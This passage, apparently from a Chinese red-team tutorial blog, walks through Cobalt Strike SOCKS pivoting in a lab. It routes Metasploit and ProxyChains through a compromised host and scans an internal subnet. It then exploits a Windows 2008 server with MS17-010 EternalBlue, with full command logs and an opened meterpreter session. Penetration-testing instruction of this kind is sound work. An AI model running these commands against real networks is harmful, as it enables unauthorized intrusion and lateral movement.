src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs20-1.png" alt=""></p> <ul><li><p>在当前 beacon 上可以右击选择 <code>Pivoting --&gt; SOCKS Server</code> 设置一个 Socks4a 代理服务</p></li> <li><p>或者使用命令 <code>socks [port]</code> 进行设置</p></li> <li><p>使用命令 <code>socks stop</code> 关闭 Socks 代理服务</p></li> <li><p>在 <code>View --&gt; Proxy Pivots</code> 中可以看到已经创建的代理服务</p></li></ul> <h3 id="metasploit-连接到-socks-代理服务">Metasploit 连接到 Socks 代理服务 <a href="#metasploit-连接到-socks-代理服务" class="header-anchor">#</a></h3> <ul><li>CS 中创建好代理后，在 Metasploit 中可以运行以下命令通过 beacon 的 Socks 代理进行通信</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>setg Proxies socks4:127.0.0.1:[port]
setg ReverseAllowProxy true
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>如果感觉上面命令比较长，还可以在 <code>Proxy Pivots</code> 界面中点击 <code>Tunnel</code> 按钮查看命令。</p> <ul><li>运行以下命令来停止</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>unsetg Proxies
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>setg 命令和 unsetg 表示在 metasploit 中全局有效，不用在每次选择模块后再重新设置。</p> <p><strong>演示</strong></p> <p>1、环境说明</p> <blockquote><p>攻击机 IP：192.168.175.200</p> <p>上线主机：外部IP 192.168.175.130、内部IP 192.168.232.133</p> <p>攻击目标：192.168.232.0/24 地址段</p></blockquote> <p>当前已经上线了一个 IP 为 192.168.175.130 主机，通过 ipconfig 发现，该主机也在 192.168.232.0/24 地址段内。</p> <p>但当前攻击机无法访问 232 的地址段，因此如果想对 232 段内的主机发起攻击，就可以采用将 192.168.175.130 作为跳板机访问的方式。</p> <p>2、设置 socks 代理</p> <p>开启交互模式</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>sleep 0
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; <span class="token function">sleep</span> 0
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to become interactive
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 16 bytes
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>开启 socks 代理</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socks 9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; socks 9527
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> started SOCKS4a server on: 9527
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 16 bytes
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>以上操作也可以通过图形化的方式进行。</p> <p>3、Metasploit 中进行设置</p> <p>开启 Metasploit 后，运行 setg 命令</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>setg Proxies socks4:192.168.175.200:9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>msf5 &gt; setg Proxies socks4:192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527
Proxies =&gt; socks4:192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>4、扫描 192.168.232.0/24 地址段中的 445 端口</p> <p>这里作为演示，只扫描一下 445 端口</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use auxiliary/scanner/smb/smb_version
set rhost 192.168.232.0/24
set threads 64
exploit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>msf5 &gt; use auxiliary<span class="token operator">/</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version 

msf5 auxiliary<span class="token punctuation">(</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version<span class="token punctuation">)</span> &gt; <span class="token function">set</span> rhost 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24 
rhost =&gt; 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24

msf5 auxiliary<span class="token punctuation">(</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version<span class="token punctuation">)</span> &gt; <span class="token function">set</span> threads 64
threads =&gt; 64

msf5 auxiliary<span class="token punctuation">(</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version<span class="token punctuation">)</span> &gt; exploit 
use auxiliary<span class="token operator">/</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_version
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned  44 of 256 hosts <span class="token punctuation">(</span>17<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned  64 of 256 hosts <span class="token punctuation">(</span>25<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 110 of 256 hosts <span class="token punctuation">(</span>42<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 111 of 256 hosts <span class="token punctuation">(</span>43<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 128 of 256 hosts <span class="token punctuation">(</span>50<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>133:445   <span class="token operator">-</span> Host is running Windows 7 Ultimate SP1 <span class="token punctuation">(</span>build:7601<span class="token punctuation">)</span> <span class="token punctuation">(</span>name:WINTEST<span class="token punctuation">)</span> <span class="token punctuation">(</span>domain:TEAMSSIX<span class="token punctuation">)</span> <span class="token punctuation">(</span>signatures:optional<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445   <span class="token operator">-</span> Host is running Windows 2008 HPC SP1 <span class="token punctuation">(</span>build:7601<span class="token punctuation">)</span> <span class="token punctuation">(</span>name:WINDC<span class="token punctuation">)</span> <span class="token punctuation">(</span>domain:TEAMSSIX<span class="token punctuation">)</span> <span class="token punctuation">(</span>signatures:required<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 165 of 256 hosts <span class="token punctuation">(</span>64<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 184 of 256 hosts <span class="token punctuation">(</span>71<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 220 of 256 hosts <span class="token punctuation">(</span>85<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 249 of 256 hosts <span class="token punctuation">(</span>97<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 256 of 256 hosts <span class="token punctuation">(</span>100<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Auxiliary module execution completed
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br></div></div><p>5、发现利用</p> <p>通过扫描发现在 192.168.232.0/24 地址段内，除了已经上线的 <code>133</code> 主机外，还有 <code>132</code> 主机也开放了 445 端口，且该主机为 Windows 2008 的操作系统，这里使用永恒之蓝作为演示。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.232.132
set payload windows/x64/meterpreter/bind_tcp
exploit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>msf5 &gt; use exploit<span class="token operator">/</span>windows<span class="token operator">/</span>smb<span class="token operator">/</span>ms17_010_eternalblue

msf5 exploit<span class="token punctuation">(</span>windows<span class="token operator">/</span>smb<span class="token operator">/</span>ms17_010_eternalblue<span class="token punctuation">)</span> &gt; <span class="token function">set</span> rhosts 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
rhosts =&gt; 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132

msf5 exploit<span class="token punctuation">(</span>windows<span class="token operator">/</span>smb<span class="token operator">/</span>ms17_010_eternalblue<span class="token punctuation">)</span> &gt; <span class="token function">set</span> payload windows<span class="token operator">/</span>x64<span class="token operator">/</span>meterpreter<span class="token operator">/</span>bind_tcp
payload =&gt; windows<span class="token operator">/</span>x64<span class="token operator">/</span>meterpreter<span class="token operator">/</span>bind_tcp

msf5 exploit<span class="token punctuation">(</span>windows<span class="token operator">/</span>smb<span class="token operator">/</span>ms17_010_eternalblue<span class="token punctuation">)</span> &gt; exploit 
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> <span class="token keyword">Using</span> auxiliary<span class="token operator">/</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_ms17_010 as check
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445   <span class="token operator">-</span> Host is likely VULNERABLE to MS17<span class="token operator">-</span>010<span class="token operator">!</span> <span class="token operator">-</span> Windows Server 2008 HPC Edition 7601 Service Pack 1 x64 <span class="token punctuation">(</span>64<span class="token operator">-</span>bit<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445   <span class="token operator">-</span> Scanned 1 of 1 hosts <span class="token punctuation">(</span>100<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Connecting to target <span class="token keyword">for</span> exploitation<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Connection established <span class="token keyword">for</span> exploitation<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Target OS selected valid <span class="token keyword">for</span> OS indicated by SMB reply
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> CORE raw buffer dump <span class="token punctuation">(</span>51 bytes<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> 0x00000010  30 30 38 20 48 50 43 20 45 64 69 74 69 6f 6e 20  008 HPC Edition 
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> 0x00000030  6b 20 31                                         k 1             
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Target arch selected valid <span class="token keyword">for</span> arch indicated by DCE<span class="token operator">/</span>RPC reply
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Trying exploit with 12 Groom Allocations<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending all but last fragment of exploit packet
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Starting non<span class="token operator">-</span>paged pool grooming
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending SMBv2 buffers
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending final SMBv2 buffers<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending last fragment of exploit packet<span class="token operator">!</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Receiving response <span class="token keyword">from</span> exploit packet
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> ETERNALBLUE overwrite completed successfully <span class="token punctuation">(</span>0xC000000D<span class="token punctuation">)</span><span class="token operator">!</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending egg to corrupted connection<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Triggering free of corrupted buffer<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Started bind TCP handler against 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:4444
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Sending stage <span class="token punctuation">(</span>201283 bytes<span class="token punctuation">)</span> to 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Meterpreter session 1 opened <span class="token punctuation">(</span>0<span class="token punctuation">.</span>0<span class="token punctuation">.</span>0<span class="token punctuation">.</span>0:0 <span class="token operator">-</span>&gt; 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527<span class="token punctuation">)</span> at 2020<span class="token operator">-</span>09<span class="token operator">-</span>01 22:13:57 <span class="token operator">-</span>0400
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> =<span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> =<span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-</span>WIN<span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> =<span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span>

meterpreter &gt; ipconfig
Interface 11
============
Name         : Intel<span class="token punctuation">(</span>R<span class="token punctuation">)</span> PRO<span class="token operator">/</span>1000 MT Network Connection
Hardware MAC : 00:0c:29:d3:6c:3d
MTU          : 1500
IPv4 Address : 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
IPv4 Netmask : 255<span class="token punctuation">.</span>255<span class="token punctuation">.</span>255<span class="token punctuation">.</span>0
IPv6 Address : fe80::a1ac:3035:cbdf:4872
IPv6 Netmask : ffff:ffff:ffff:ffff::
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br></div></div><h3 id="使用-proxychains-进行代理转发">使用 ProxyChains 进行代理转发 <a href="#使用-proxychains-进行代理转发" class="header-anchor">#</a></h3> <p>使用 ProxyChains 可以使我们为没有代理配置功能的软件强制使用代理</p> <ol><li>和<a href="https://teamssix.com/year/200419-150644.html" target="_blank" rel="noopener noreferrer">上一节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>中介绍的一致，开启一个 socks 代理服务</li> <li>配置 <code>/etc/proxychains.conf</code> 文件</li> <li>运行 <code>proxychains + 待执行命令</code></li></ol> <p>接下来继续<a href="https://teamssix.com/year/200419-150644.html" target="_blank" rel="noopener noreferrer">上一节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>中的演示环境：</p> <blockquote><p>攻击机 IP：192.168.175.200</p> <p>上线主机：外部IP 192.168.175.130、内部IP 192.168.232.133</p> <p>攻击目标：192.168.232.0/24 地址段</p></blockquote> <p>1、设置 socks 代理</p> <p>首先开启交互模式，之后开启 socks 代理</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>sleep 0
socks 9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; <span class="token function">sleep</span> 0
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to become interactive
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 16 bytes
beacon&gt; socks 9527
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 16 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> started SOCKS4a server on: 9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>2、配置  ProxyChains</p> <p>在攻击机上，配置 <code>/etc/proxychains.conf</code> 文件的最后一行，根据当前攻击主机 IP 与设置的 Socks 端口，修改如下：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socks4 192.168.175.200 9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、开始使用  ProxyChains</p> <p>根据<a href="https://teamssix.com/year/200419-150644.html" target="_blank" rel="noopener noreferrer">上一节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>使用 Metasploit 的扫描可以知道，在 192.168.232.0/24 地址段中存在主机 192.168.232.132 ，接下来使用 nmap 扫描一下常见的端口，这里以 80,443,445,3389 作为演示。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>proxychains nmap -sT -Pn 192.168.232.132 -p 80,443,445,3389
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p>-sT：使用 TCP 扫描</p> <p>-Pn：不使用 Ping</p> <p>-p：指定扫描端口</p> <p>注：不加上 -sT -Pn 参数，将无法使用 proxychains 进行代理扫描</p></blockquote> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>&gt; proxychains nmap <span class="token operator">-</span>sT <span class="token operator">-</span>Pn 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132 <span class="token operator">-</span>p 80<span class="token punctuation">,</span>443<span class="token punctuation">,</span>445<span class="token punctuation">,</span>3389                       
<span class="token namespace">[proxychains]</span> config file found: <span class="token operator">/</span>etc<span class="token operator">/</span>proxychains<span class="token punctuation">.</span>conf
